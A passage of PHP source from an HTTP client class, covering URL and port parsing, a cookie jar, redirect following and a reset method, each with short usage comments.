\npreg_match(\"/:(\\d+)\\//\",$urltarg,$matches); \n$this->port=empty($matches[1]) ? 80 : $matches[1]; \n \n$temp = str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg)); \npreg_match(\"/\\/(.*)\\//\",$temp,$matches); \n$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\"); \n \nif($this->port > 65535) die(\"Error: Invalid port number\"); \n} \n \n \n/** \n* If you call this function, the script will \n* extract all \"Set-Cookie\" headers values \n* and it will automatically add them into the \"Cookie\" header \n* for all next requests. \n* \n* $this->cookiejar(1); // enabled \n* $this->cookiejar(0); // disabled \n* \n*/ \npublic function cookiejar($code) \n{ \nif($code===0) $this->cookiejar=''; \nif($code===1) $this->cookiejar=1; \nelse \n{ \n$this->getcookie($code); \n} \n} \n \n \n/** \n* If you call this function, the script will \n* follow all redirections sent by the server. \n* \n* $this->allowredirection(1); // enabled \n* $this->allowredirection(0); // disabled \n* \n* @return $this->get($locationresponse) \n*/ \npublic function allowredirection($code) \n{ \nif($code===0) $this->allowredirection=''; \nif($code===1) $this->allowredirection=1; \nelse \n{ \nif(preg_match(\"/(location|content-location|uri): (.*)/i\",$code,$codearr)) \n{ \n$location = str_replace(chr(13),'',$codearr[2]); \nif(!eregi(\"://\",$location)) \n{ \nreturn $this->get(\"http://\".$this->host.$this->path.$location); \n} \nelse \n{ \nreturn $this->get($location); \n} \n} \nelse \n{ \nreturn $code; \n} \n} \n} \n \n \n/** \n* This function allows you to reset some parameters: \n* \n* $this->reset(header); // headers cleaned \n* $this->reset(cookie); // cookies cleaned \n* $this->reset(); // clean all parameters \n* \n* @param string $func \n*/ \npublic function reset($func='') \n{ \nswitch($func) \n{ \ncase \"header\": \n$this->header=''; \nbreak; \n \ncase \"cookie\": \n$this->cookie=''; \nbreak; \n \ndefault: \n$this->cookiejar=''; \n$this->header=''; \n$this->cookie=''; \n$this->allowredirection=''; \n$this->agent=''; \nbreak; \n} \n} \n} \n?> \n \n`\n"}

{}